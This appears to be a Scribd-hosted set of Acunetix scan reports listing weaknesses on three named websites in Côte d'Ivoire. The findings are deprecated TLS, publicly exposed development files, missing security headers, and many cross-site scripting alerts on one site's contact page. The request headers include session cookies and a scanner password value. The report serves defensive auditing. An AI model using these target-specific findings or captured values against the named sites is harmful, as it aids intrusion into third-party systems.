0% found this document useful (1 vote)
308 views225 pages

Developer All Vulnerabilities

The security audit report found 3 vulnerabilities: 1. The web server supports the deprecated TLS 1.0 and 1.1 encryption protocols. 2. Development configuration files were found that could disclose sensitive information if accessed. 3. One or more high severity vulnerabilities were discovered that could allow a malicious user to compromise the backend database or deface the website.

Uploaded by

optimium888
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (1 vote)
308 views225 pages

Developer All Vulnerabilities

The security audit report found 3 vulnerabilities: 1. The web server supports the deprecated TLS 1.0 and 1.1 encryption protocols. 2. Development configuration files were found that could disclose sensitive information if accessed. 3. One or more high severity vulnerabilities were discovered that could allow a malicious user to compromise the backend database or deface the website.

Uploaded by

optimium888
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 225

Developer

Report
Acunetix Security Audit

2023-07-28

Generated by Acunetix

1
Vulnerabilities
Scan details
Scan information
Start url https://macgrae.ci/adhesion
Host https://macgrae.ci/

Threat level

Acunetix Threat Level 3

One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.

Alerts distribution

Total alerts found 3


High 1
Medium 2
Low 0
Informational 0

2
Alerts summary


TLS 1.0 enabled

Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Base Score: 5.4

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: None

Base Score: 5.8

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-326
Affected items Variation
Web Server 1


Development configuration files

Classification
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

Base Score: 3.1

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

3
Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-538
Affected items Variation
Web Server 1

TLS 1.1 enabled

Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Base Score: 5.4

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: None

Base Score: 5.8

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-326
Affected items Variation
Web Server 1

4
Alerts details


TLS 1.0 enabled

Severity High
Reported by module /Scripts/PerServer/SSL_Audit.script

Description

The web server supports encryption through TLS 1.0, which was formally deprecated in March 2021 as a result of inherent
security issues.
In addition, TLS 1.0 is not considered to be "strong cryptography" as defined and required by the PCI Data
Security Standard 3.2(.1) when used to protect sensitive information transferred to or from web sites.
According to PCI, "30
June 2018 is the deadline for disabling SSL/early TLS and implementing a more secure encryption protocol – TLS 1.1 or
higher (TLS v1.2 is strongly encouraged) in order to meet the PCI Data Security Standard (PCI DSS) for safeguarding
payment data.

Impact

An attacker may be able to exploit this problem to conduct man-in-the-middle attacks and decrypt communications between
the affected service and clients.

Recommendation

It is recommended to disable TLS 1.0 and replace it with TLS 1.2 or higher.

References

RFC 8996: Deprecating TLS 1.0 and TLS 1.1 (https://tools.ietf.org/html/rfc8996)

Are You Ready for 30 June 2018? Saying Goodbye to SSL/early TLS (https://blog.pcisecuritystandards.org/are-you-ready-
for-30-june-2018-sayin-goodbye-to-ssl-early-tls)
PCI 3.1 and TLS 1.2 (Cloudflare Support) (https://support.cloudflare.com/hc/en-us/articles/205043158-PCI-3-1-and-TLS-1-
2)

Affected items

Web Server
Details
The SSL server (port: 443) encrypts traffic using TLSv1.0.

Request headers


Development configuration files

Severity Medium
Reported by module /Scripts/PerFolder/Development_Files.script

Description

One or more configuration files (e.g. Vagrantfile, Gemfile, Rakefile, ...) were found. These files may expose sensitive
information that could help a malicious user to prepare more advanced attacks. It's recommended to remove or restrict
access to this type of files from production systems.

Impact

5
These files may disclose sensitive information. This information can be used to launch further attacks.

Recommendation

Remove or restrict access to all configuration files acessible from internet.

Affected items

Web Server
Details
Development configuration files:

https://macgrae.ci/bootstrap-4/Gemfile

Gemfile => A format for describing gem dependencies for Ruby programs.

https://macgrae.ci/bootstrap-4/Gemfile.lock

Gemfile.lock => A format for describing gem dependencies for Ruby programs.

https://macgrae.ci/bootstrap-4/package.json

package.json => Grunt configuration file. Grunt is a JavaScript task runner.

https://macgrae.ci/bootstrap-4/composer.json

composer.json => Composer configuration file. Composer is a dependency manager for PH

https://macgrae.ci/bootstrap-4/.travis.yml

.travis.yml => Travis CI configuration file. Travis CI makes working in a team for a

https://macgrae.ci/bootstrap-4/package-lock.json

package-lock.json => npm file. This file keeps track of the exact version of every pa

Request headers
GET /bootstrap-4/Gemfile HTTP/1.1

Cookie: PHPSESSID=qdrsoisvooap6u1unh4c7c0p71

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: macgrae.ci

Connection: Keep-alive


TLS 1.1 enabled

Severity Medium
Reported by module /Scripts/PerServer/SSL_Audit.script

6
Description

The web server supports encryption through TLS 1.1, which was formally deprecated in March 2021 as a result of inherent
security issues.
When aiming for Payment Card Industry (PCI) Data Security Standard (DSS) compliance, it is
recommended to use TLS 1.2 or higher instead.
According to PCI, "30 June 2018 is the deadline for disabling SSL/early
TLS and implementing a more secure encryption protocol – TLS 1.1 or higher (TLS v1.2 is strongly encouraged) in order to
meet the PCI Data Security Standard (PCI DSS) for safeguarding payment data.

Impact

An attacker may be able to exploit this problem to conduct man-in-the-middle attacks and decrypt communications between
the affected service and clients.

Recommendation

It is recommended to disable TLS 1.1 and replace it with TLS 1.2 or higher.

References

RFC 8996: Deprecating TLS 1.0 and TLS 1.1 (https://tools.ietf.org/html/rfc8996)

Are You Ready for 30 June 2018? Saying Goodbye to SSL/early TLS (https://blog.pcisecuritystandards.org/are-you-ready-
for-30-june-2018-sayin-goodbye-to-ssl-early-tls)
PCI 3.1 and TLS 1.2 (Cloudflare Support) (https://support.cloudflare.com/hc/en-us/articles/205043158-PCI-3-1-and-TLS-1-
2)

Affected items

Web Server
Details
The SSL server (port: 443) encrypts traffic using TLSv1.1.

Request headers

7
Scanned items (coverage report)
https://macgrae.ci/

8
Vulnerabilities
Scan details
Scan information
Start url https://macgrae.ci/
Host https://macgrae.ci/

Threat level

Acunetix Threat Level 3

One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.

Alerts distribution

Total alerts found 3


High 1
Medium 2
Low 0
Informational 0

9
Alerts summary


TLS 1.0 enabled

Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Base Score: 5.4

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: None

Base Score: 5.8

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-326
Affected items Variation
Web Server 1


Development configuration files

Classification
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

Base Score: 3.1

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

10
Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-538
Affected items Variation
Web Server 1

TLS 1.1 enabled

Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Base Score: 5.4

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: None

Base Score: 5.8

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-326
Affected items Variation
Web Server 1

11
Alerts details


TLS 1.0 enabled

Severity High
Reported by module /Scripts/PerServer/SSL_Audit.script

Description

The web server supports encryption through TLS 1.0, which was formally deprecated in March 2021 as a result of inherent
security issues.
In addition, TLS 1.0 is not considered to be "strong cryptography" as defined and required by the PCI Data
Security Standard 3.2(.1) when used to protect sensitive information transferred to or from web sites.
According to PCI, "30
June 2018 is the deadline for disabling SSL/early TLS and implementing a more secure encryption protocol – TLS 1.1 or
higher (TLS v1.2 is strongly encouraged) in order to meet the PCI Data Security Standard (PCI DSS) for safeguarding
payment data.

Impact

An attacker may be able to exploit this problem to conduct man-in-the-middle attacks and decrypt communications between
the affected service and clients.

Recommendation

It is recommended to disable TLS 1.0 and replace it with TLS 1.2 or higher.

References

RFC 8996: Deprecating TLS 1.0 and TLS 1.1 (https://tools.ietf.org/html/rfc8996)

Are You Ready for 30 June 2018? Saying Goodbye to SSL/early TLS (https://blog.pcisecuritystandards.org/are-you-ready-
for-30-june-2018-sayin-goodbye-to-ssl-early-tls)
PCI 3.1 and TLS 1.2 (Cloudflare Support) (https://support.cloudflare.com/hc/en-us/articles/205043158-PCI-3-1-and-TLS-1-
2)

Affected items

Web Server
Details
The SSL server (port: 443) encrypts traffic using TLSv1.0.

Request headers


Development configuration files

Severity Medium
Reported by module /Scripts/PerFolder/Development_Files.script

Description

One or more configuration files (e.g. Vagrantfile, Gemfile, Rakefile, ...) were found. These files may expose sensitive
information that could help a malicious user to prepare more advanced attacks. It's recommended to remove or restrict
access to this type of files from production systems.

Impact

12
These files may disclose sensitive information. This information can be used to launch further attacks.

Recommendation

Remove or restrict access to all configuration files acessible from internet.

Affected items

Web Server
Details
Development configuration files:

https://macgrae.ci/bootstrap-4/Gemfile

Gemfile => A format for describing gem dependencies for Ruby programs.

https://macgrae.ci/bootstrap-4/Gemfile.lock

Gemfile.lock => A format for describing gem dependencies for Ruby programs.

https://macgrae.ci/bootstrap-4/package.json

package.json => Grunt configuration file. Grunt is a JavaScript task runner.

https://macgrae.ci/bootstrap-4/composer.json

composer.json => Composer configuration file. Composer is a dependency manager for PH

https://macgrae.ci/bootstrap-4/.travis.yml

.travis.yml => Travis CI configuration file. Travis CI makes working in a team for a

https://macgrae.ci/bootstrap-4/package-lock.json

package-lock.json => npm file. This file keeps track of the exact version of every pa

https://macgrae.ci/js/jquery-ui-1.12.1/package.json

package.json => Grunt configuration file. Grunt is a JavaScript task runner.

Request headers
GET /bootstrap-4/Gemfile HTTP/1.1

Cookie: PHPSESSID=gupt00ceptea0bp7s2q0dui7q1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: macgrae.ci

Connection: Keep-alive


TLS 1.1 enabled

13
Severity Medium
Reported by module /Scripts/PerServer/SSL_Audit.script

Description

The web server supports encryption through TLS 1.1, which was formally deprecated in March 2021 as a result of inherent
security issues.
When aiming for Payment Card Industry (PCI) Data Security Standard (DSS) compliance, it is
recommended to use TLS 1.2 or higher instead.
According to PCI, "30 June 2018 is the deadline for disabling SSL/early
TLS and implementing a more secure encryption protocol – TLS 1.1 or higher (TLS v1.2 is strongly encouraged) in order to
meet the PCI Data Security Standard (PCI DSS) for safeguarding payment data.

Impact

An attacker may be able to exploit this problem to conduct man-in-the-middle attacks and decrypt communications between
the affected service and clients.

Recommendation

It is recommended to disable TLS 1.1 and replace it with TLS 1.2 or higher.

References

RFC 8996: Deprecating TLS 1.0 and TLS 1.1 (https://tools.ietf.org/html/rfc8996)

Are You Ready for 30 June 2018? Saying Goodbye to SSL/early TLS (https://blog.pcisecuritystandards.org/are-you-ready-
for-30-june-2018-sayin-goodbye-to-ssl-early-tls)
PCI 3.1 and TLS 1.2 (Cloudflare Support) (https://support.cloudflare.com/hc/en-us/articles/205043158-PCI-3-1-and-TLS-1-
2)

Affected items

Web Server
Details
The SSL server (port: 443) encrypts traffic using TLSv1.1.

Request headers

14
Scanned items (coverage report)
https://macgrae.ci/

15
Vulnerabilities
Scan details
Scan information
Start url https://portail.nsiaassurances.ci/
Host https://portail.nsiaassurances.ci/

Threat level

Acunetix Threat Level 0

No vulnerabilities have been discovered by the scanner.

Alerts distribution

Total alerts found 5


High 0
Medium 0
Low 0
Informational 5

16
Alerts summary


Content Security Policy (CSP) not implemented

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-1021
Affected items Variation
Web Server 1


HTTP Strict Transport Security (HSTS) not following best practices

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

17
Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-16
Affected items Variation
Web Server 1

Permissions-Policy header not implemented

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-1021
Affected items Variation
Web Server 1

Reverse proxy detected

Classification

18
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-16
Affected items Variation
Web Server 1

Subresource Integrity (SRI) not implemented

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:N

Base Score: 0.0

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

Base Score: 0.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

19
CWE CWE-830
Affected items Variation
Web Server 1

20
Alerts details


Content Security Policy (CSP) not implemented

Severity Informational
Reported by module /httpdata/CSP_not_implemented.js

Description

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks,
including Cross Site Scripting (XSS) and data injection attacks.

Content Security Policy (CSP) can be implemented by adding a Content-Security-Policy header. The value of this header
is a string containing the policy directives describing your Content Security Policy. To implement CSP, you should define
lists of allowed origins for the all of the types of resources that your site utilizes. For example, if you have a simple site that
needs to load scripts, stylesheets, and images hosted locally, as well as from the jQuery library from their CDN, the CSP
header could look like the following:

Content-Security-Policy:

default-src 'self';

script-src 'self' https://code.jquery.com;

It was detected that your web application doesn't implement Content Security Policy (CSP) as the CSP header is missing
from the response. It's recommended to implement Content Security Policy (CSP) into your web application.

Impact

CSP can be used to prevent and/or mitigate attacks that involve content/code injection, such as cross-site scripting/XSS
attacks, attacks that require embedding a malicious resource, attacks that involve malicious use of iframes, such as
clickjacking attacks, and others.

Recommendation

It's recommended to implement Content Security Policy (CSP) into your web application. Configuring Content Security
Policy involves adding the Content-Security-Policy HTTP header to a web page and giving it values to control resources
the user agent is allowed to load for that page.

References

Content Security Policy (CSP) (https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)

Implementing Content Security Policy (https://hacks.mozilla.org/2016/02/implementing-content-security-policy/)

Affected items

Web Server
Details

21
Paths without CSP header:

https://portail.nsiaassurances.ci/

https://portail.nsiaassurances.ci/sitemap.xml

https://portail.nsiaassurances.ci/sitemap.xml.gz

https://portail.nsiaassurances.ci/auth/login

https://portail.nsiaassurances.ci/auth/reset

https://portail.nsiaassurances.ci/auth/

https://portail.nsiaassurances.ci/auth

Request headers
GET / HTTP/1.1

Acunetix-Aspect: enabled

Acunetix-Aspect-Password: bb88e596a671e4e023f864858db27c3a

Acunetix-Aspect-ScanID: 8424555818535376921

Acunetix-Aspect-Queries: filelist;packages;aspectalerts;routes

Referer: https://portail.nsiaassurances.ci/

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: portail.nsiaassurances.ci

Connection: Keep-alive


HTTP Strict Transport Security (HSTS) not following best practices

Severity Informational
Reported by module /httpdata/HSTS_not_implemented.js

Description

HTTP Strict Transport Security (HSTS) instructs a web browser to only connect to a web site using HTTPS.
It was detected
that your web application's HTTP Strict Transport Security (HSTS) implementation is not as strict as is typically advisable.

Impact

HSTS can be used to prevent and/or mitigate some types of man-in-the-middle (MitM) attacks

22
Recommendation

It is recommended to implement best practices of HTTP Strict Transport Security (HSTS) in your web application. Consult
web references for more information.

References

hstspreload.org (https://hstspreload.org/)

MDN: Strict-Transport-Security (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security)

Affected items

Web Server
Details
URLs where HSTS configuration is not according to best practices:

https://portail.nsiaassurances.ci/ - No includeSubDomains directive


https://portail.nsiaassurances.ci/sitemap.xml - No includeSubDomains directive
https://portail.nsiaassurances.ci/sitemap.xml.gz - No includeSubDomains directive
https://portail.nsiaassurances.ci/auth/login - No includeSubDomains directive
https://portail.nsiaassurances.ci/auth/reset - No includeSubDomains directive
https://portail.nsiaassurances.ci/auth/ - No includeSubDomains directive
https://portail.nsiaassurances.ci/auth - No includeSubDomains directive

Request headers
GET / HTTP/1.1

Acunetix-Aspect: enabled

Acunetix-Aspect-Password: bb88e596a671e4e023f864858db27c3a

Acunetix-Aspect-ScanID: 8424555818535376921

Acunetix-Aspect-Queries: filelist;packages;aspectalerts;routes

Referer: https://portail.nsiaassurances.ci/

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: portail.nsiaassurances.ci

Connection: Keep-alive


Permissions-Policy header not implemented

Severity Informational
Reported by module /httpdata/permissions_policy.js

23
Description

The Permissions-Policy header allows developers to selectively enable and disable use of various browser features and
APIs.

Impact

Recommendation

References

Permissions-Policy / Feature-Policy (MDN) (https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Feature-Policy)

Permissions Policy (W3C) (https://www.w3.org/TR/permissions-policy-1/)

Affected items

Web Server
Details
Locations without Permissions-Policy header:

https://portail.nsiaassurances.ci/
https://portail.nsiaassurances.ci/sitemap.xml
https://portail.nsiaassurances.ci/sitemap.xml.gz
https://portail.nsiaassurances.ci/assets/
https://portail.nsiaassurances.ci/assets/langs/
https://portail.nsiaassurances.ci/auth/login
https://portail.nsiaassurances.ci/auth/reset
https://portail.nsiaassurances.ci/auth/
https://portail.nsiaassurances.ci/auth

Request headers
GET / HTTP/1.1

Acunetix-Aspect: enabled

Acunetix-Aspect-Password: bb88e596a671e4e023f864858db27c3a

Acunetix-Aspect-ScanID: 8424555818535376921

Acunetix-Aspect-Queries: filelist;packages;aspectalerts;routes

Referer: https://portail.nsiaassurances.ci/

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: portail.nsiaassurances.ci

Connection: Keep-alive

24

Reverse proxy detected

Severity Informational
Reported by module /target/RevProxy_Detection.js

Description

This server uses a reverse proxy, a load balancer or a CDN (Content Delivery Network) or it's hosted in a cloud provider.
Acunetix detected this by sending various payloads and detecting changes in headers and body.

Impact

No impact is associated with this vulnerability.

Recommendation

None

Affected items

Web Server
Details
Detected reverse proxy: Apache httpd
Request headers
GET / HTTP/1.1

Max-Forwards: 0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: portail.nsiaassurances.ci

Connection: Keep-alive


Subresource Integrity (SRI) not implemented

Severity Informational
Reported by module /RPA/SRI_Not_Implemented.js

Description

Subresource Integrity (SRI) is a security feature that enables browsers to verify that third-party resources they fetch (for
example, from a CDN) are delivered without unexpected manipulation. It works by allowing developers to provide a
cryptographic hash that a fetched file must match.

Third-party resources (such as scripts and stylesheets) can be manipulated. An attacker that has access or has hacked the

25
hosting CDN can manipulate or replace the files. SRI allows developers to specify a base64-encoded cryptographic hash of
the resource to be loaded. The integrity attribute containing the hash is then added to the <script> HTML element tag. The
integrity string consists of a base64-encoded hash, followed by a prefix that depends on the hash algorithm. This prefix can
either be sha256, sha384 or sha512.

The script loaded from the external URL specified in the Details section doesn't implement Subresource Integrity (SRI). It's
recommended to implement Subresource Integrity (SRI) for all the scripts loaded from external hosts.

Impact

An attacker that has access or has hacked the hosting CDN can manipulate or replace the files.

Recommendation

Use the SRI Hash Generator link (from the References section) to generate a <script> element that implements
Subresource Integrity (SRI).

For example, you can use the following <script> element to tell a browser that before executing the
https://example.com/example-framework.js script, the browser must first compare the script to the expected hash, and
verify that there's a match.

<script src="https://example.com/example-framework.js"

integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"

crossorigin="anonymous"></script>

References

Subresource Integrity (https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)

SRI Hash Generator (https://www.srihash.org/)

Affected items

Web Server
Details
Pages where SRI is not implemented:

https://portail.nsiaassurances.ci/

Script SRC: https://cdn.cinetpay.com/seamless/main.js

Request headers

26
GET / HTTP/1.1

Acunetix-Aspect: enabled

Acunetix-Aspect-Password: bb88e596a671e4e023f864858db27c3a

Acunetix-Aspect-ScanID: 8424555818535376921

Acunetix-Aspect-Queries: filelist;packages;aspectalerts;routes

Referer: https://portail.nsiaassurances.ci/

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/106.0.0.0 Safari/537.36

Host: portail.nsiaassurances.ci

Connection: Keep-alive

27
Scanned items (coverage report)
https://portail.nsiaassurances.ci/

28
Vulnerabilities
Scan details
Scan information
Start url https://www.sogbci.com/
Host https://www.sogbci.com/

Threat level

Acunetix Threat Level 3

One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.

Alerts distribution

Total alerts found 90


High 87
Medium 1
Low 1
Informational 1

29
Alerts summary


Cross site scripting

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 6.4

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: Not_defined

Remediation Level: Not_defined

Report Confidence: Not_defined

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CWE CWE-79
Affected items Variation
/contacts 1


